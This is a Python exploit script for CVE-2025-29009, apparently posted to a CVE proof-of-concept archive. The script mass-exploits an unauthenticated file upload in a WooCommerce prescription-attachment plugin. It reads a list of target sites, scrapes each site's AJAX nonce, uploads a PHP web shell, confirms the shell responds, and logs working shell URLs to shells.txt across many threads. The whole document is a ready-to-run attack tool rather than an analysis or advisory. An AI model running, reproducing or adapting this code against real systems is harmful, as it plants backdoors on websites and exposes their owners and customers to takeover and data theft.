5465 Total CVEs
26 Years
GitHub
README.md
Rendering markdown...
POC / CVE-2025-29009.py PY
#Nxploited
# GitHub: https://github.com/Nxploited

import threading
import requests
import time
import os
import re
import json
import urllib3
import warnings
from queue import Queue, Empty
from rich.console import Console
from rich.text import Text
from rich.panel import Panel
from rich import box
from rich.theme import Theme

urllib3.disable_warnings(urllib3.exceptions.InsecureRequestWarning)
warnings.filterwarnings("ignore", category=urllib3.exceptions.InsecureRequestWarning)
os.environ["NO_PROXY"] = "*"

theme = Theme({
    "banner": "bold bright_cyan",
    "accent": "bold bright_white",
    "ok": "bold bright_green",
    "fail": "bold bright_red",
    "info": "bright_white",
    "dim": "dim",
    "hacker": "bold bright_green",
})

console = Console(
    theme=theme,
    force_terminal=True,
    color_system="truecolor",
    soft_wrap=True
)

USER_AGENT = "Mozilla/5.0 (Windows NT 10.0; Win64; x64)"
REQUEST_TIMEOUT = 10
DEFAULT_THREADS = 10

SHELLS_FILE = "shells.txt"
shell_local_file = None
shell_signature = None

target_queue: "Queue[str]" = Queue()
state = {
    "total": 0,
    "processed": 0,
    "ok": 0,
    "fail": 0,
}
state_lock = threading.Lock()


def banner():
    lines = [
        " ,-. .   , ,--.     ,-.   ,-.  ,-.  ;--'     ,-.   ,-.   ,-.   ,-.   ,-.  ",
        "/    |  /  |           ) /  /\\    ) |           ) (   ) /  /\\ /  /\\ (   ) ",
        "|    | /   |-   ---   /  | / |   /  `-.  ---   /   `-'| | / | | / |  `-'| ",
        "\\    |/    |         /   \\/  /  /      )      /       / \\/  / \\/  /     / ",
        " `-' '     `--'     '--'  `-'  '--' `-'      '--'  `-'   `-'   `-'   `-'  ",
    ]
    name = "Nxploited"
    name_len = len(name)

    txt = Text()
    for idx, line in enumerate(lines):
        if idx == 2:
            mid = len(line) // 2
            start = mid - (name_len // 2)
            if start < 0:
                start = 0
            end = start + name_len
            left = line[:start]
            right = line[end:]
            txt.append(left, style="banner")
            txt.append(name, style="hacker")
            txt.append(right + "\n", style="banner")
        else:
            txt.append(line + "\n", style="banner")

    txt.append("\n", style="banner")
    txt.append("CVE-2025-29009 | File Upload\n", style="ok")
    console.print(Panel(txt, box=box.SQUARE, border_style="ok"))


def ask_config():
    global shell_local_file, shell_signature

    list_file = console.input("[accent]Targets file (default list.txt): [/]").strip()
    if not list_file:
        list_file = "list.txt"

    threads_raw = console.input(f"[accent]Threads (default {DEFAULT_THREADS}): [/]").strip()
    try:
        threads = int(threads_raw) if threads_raw else DEFAULT_THREADS
    except Exception:
        threads = DEFAULT_THREADS
    if threads < 1:
        threads = 1

    shell_name = console.input("[accent]Local shell filename (e.g. shell.php): [/]").strip()
    if not shell_name:
        shell_name = "shell.php"
    shell_local_file = shell_name

    sig = console.input("[accent]Unique shell signature (e.g. NxploitedShellOK): [/]").strip()
    if not sig:
        sig = "NxploitedShellOK"
    shell_signature = sig

    return list_file, threads


def read_targets(path: str):
    targets = []
    try:
        with open(path, "r", encoding="utf-8", errors="ignore") as f:
            for line in f:
                url = line.strip()
                if not url:
                    continue
                if not url.lower().startswith(("http://", "https://")):
                    url = "http://" + url
                targets.append(url.rstrip("/"))
    except FileNotFoundError:
        console.print(f"[fail]Targets file not found: {path}[/fail]")
        raise
    return targets


def save_shell_url(url: str):
    try:
        with open(SHELLS_FILE, "a", encoding="utf-8", errors="ignore") as f:
            f.write(url.strip() + "\n")
    except Exception:
        pass


def wide_nonce_extract(html: str):
    patterns = [
        r"var\s+wkwcpaFrontObj\s*=\s*(\{.*?\});",
        r"wkwcpaFrontObj\s*=\s*(\{.*?\});",
    ]
    for pat in patterns:
        m = re.search(pat, html, re.DOTALL)
        if not m:
            continue
        obj_str = m.group(1)
        try:
            data = json.loads(obj_str)
        except Exception:
            continue
        ajax = data.get("ajax", {})
        ajax_url = ajax.get("ajaxUrl") or ajax.get("ajax_url")
        ajax_nonce = ajax.get("ajaxNonce") or ajax.get("ajax_nonce")
        if ajax_url and ajax_nonce:
            return ajax_url, ajax_nonce

    m = re.search(r'"ajaxUrl"\s*:\s*"([^"]+)"[^}]*"ajaxNonce"\s*:\s*"([^"]+)"', html)
    if m:
        return m.group(1), m.group(2)

    m = re.search(r'"ajaxNonce"\s*:\s*"([^"]+)"[^}]*"ajaxUrl"\s*:\s*"([^"]+)"', html)
    if m:
        return m.group(2), m.group(1)

    m = re.search(r'wkwcpaFrontObj[^;]*', html)
    if m:
        chunk = m.group(0)
        url_m = re.search(r'["\']ajaxUrl["\']\s*:\s*["\']([^"\']+)["\']', chunk)
        nonce_m = re.search(r'["\']ajaxNonce["\']\s*:\s*["\']([^"\']+)["\']', chunk)
        if url_m and nonce_m:
            return url_m.group(1), nonce_m.group(1)

    return None, None


def resolve_front_page(base: str):
    candidates = [
        base + "/",
        base + "/shop/",
        base + "/product/",
        base + "/?wkwcpa=1",
    ]
    for url in candidates:
        try:
            resp = requests.get(
                url,
                headers={"User-Agent": USER_AGENT},
                verify=False,
                timeout=REQUEST_TIMEOUT,
            )
            if resp.status_code in (200, 302, 301):
                return url, resp.text
        except Exception:
            continue
    return None, None


def get_nonce_and_ajax(base: str):
    front_url, html = resolve_front_page(base)
    if not front_url or not html:
        return None, None, "no_front_page"

    ajax_url, nonce = wide_nonce_extract(html)
    if not ajax_url or not nonce:
        return None, None, "nonce_not_found"

    return ajax_url, nonce, None


def upload_shell(base: str):
    if not shell_local_file or not os.path.exists(shell_local_file):
        return False, None, "shell_file_missing"

    ajax_url, nonce, err = get_nonce_and_ajax(base)
    if err is not None:
        return False, None, err

    files = {
        "wkwc_pa_prescription_attachment[]": open(shell_local_file, "rb")
    }
    data = {
        "action": "wkwcpa_handle_prescription_session",
        "nonce": nonce,
        "type": "upload",
    }

    try:
        resp = requests.post(
            ajax_url,
            data=data,
            files=files,
            headers={"User-Agent": USER_AGENT},
            verify=False,
            timeout=REQUEST_TIMEOUT,
        )
    except Exception:
        try:
            files["wkwc_pa_prescription_attachment[]"].close()
        except Exception:
            pass
        return False, None, "upload_error"

    try:
        files["wkwc_pa_prescription_attachment[]"].close()
    except Exception:
        pass

    try:
        result = resp.json()
    except Exception:
        return False, None, "json_parse_error"

    if not isinstance(result, dict):
        return False, None, "json_not_dict"

    data_obj = result.get("data") or {}
    if not isinstance(data_obj, dict):
        return False, None, "data_not_dict"

    if not data_obj.get("success"):
        return False, None, "success_false"

    attachments = data_obj.get("attachments_img_html") or []
    if not isinstance(attachments, list) or not attachments:
        return False, None, "no_attachments"

    html = " ".join(str(x) for x in attachments)
    name = os.path.basename(shell_local_file)

    m = re.search(r'src=["\']([^"\']*%s)["\']' % re.escape(name), html)
    if not m:
        m = re.search(r'src=["\']([^"\']+)["\']', html)
        if not m:
            return False, None, "shell_url_not_found"

    shell_url = m.group(1)
    return True, shell_url, None


def verify_shell(shell_url: str):
    try:
        resp = requests.get(
            shell_url,
            headers={"User-Agent": USER_AGENT},
            verify=False,
            timeout=REQUEST_TIMEOUT,
        )
    except Exception:
        return False
    if resp.status_code == 200 and shell_signature and shell_signature in resp.text:
        return True
    return False


def print_status_line():
    with state_lock:
        total = state["total"]
        processed = state["processed"]
        ok = state["ok"]
        fail = state["fail"]
    msg = Text()
    msg.append("[", style="dim")
    msg.append("Status", style="accent")
    msg.append("] ", style="dim")
    msg.append(f"{processed}/{total} ", style="info")
    msg.append("OK:", style="dim")
    msg.append(f"{ok} ", style="ok")
    msg.append("FAIL:", style="dim")
    msg.append(f"{fail}", style="fail")
    console.print(msg)


def worker():
    while True:
        try:
            target = target_queue.get_nowait()
        except Empty:
            return

        base = target.rstrip("/")

        try:
            ok, shell_url, err = upload_shell(base)
        except Exception:
            ok, shell_url, err = False, None, "internal_error"

        if ok and shell_url and verify_shell(shell_url):
            save_shell_url(shell_url)
            with state_lock:
                state["ok"] += 1
            console.print(f"[ok]SHELL[/ok] {shell_url}")
        else:
            with state_lock:
                state["fail"] += 1
            console.print(f"[fail]FAIL[/fail] {base} ({err})")

        with state_lock:
            state["processed"] += 1

        target_queue.task_done()


def main():
    banner()
    list_file, threads = ask_config()

    try:
        targets = read_targets(list_file)
    except Exception:
        return

    if not targets:
        console.print("[fail]No targets loaded[/fail]")
        return

    for t in targets:
        target_queue.put(t)

    with state_lock:
        state["total"] = len(targets)
        state["processed"] = 0
        state["ok"] = 0
        state["fail"] = 0

    threads_list = []
    for _ in range(min(threads, len(targets) or 1)):
        th = threading.Thread(target=worker, daemon=True)
        th.start()
        threads_list.append(th)

    last_processed = -1
    while True:
        with state_lock:
            processed = state["processed"]
            total = state["total"]
        if processed != last_processed:
            print_status_line()
            last_processed = processed
        if processed >= total:
            break
        time.sleep(0.5)

    target_queue.join()
    for th in threads_list:
        th.join(timeout=0.1)

    console.print()
    print_status_line()
    console.print(Panel(Text(f"Shell URLs saved to {SHELLS_FILE}", style="ok"), border_style="ok", box=box.ROUNDED))


if __name__ == "__main__":
    main()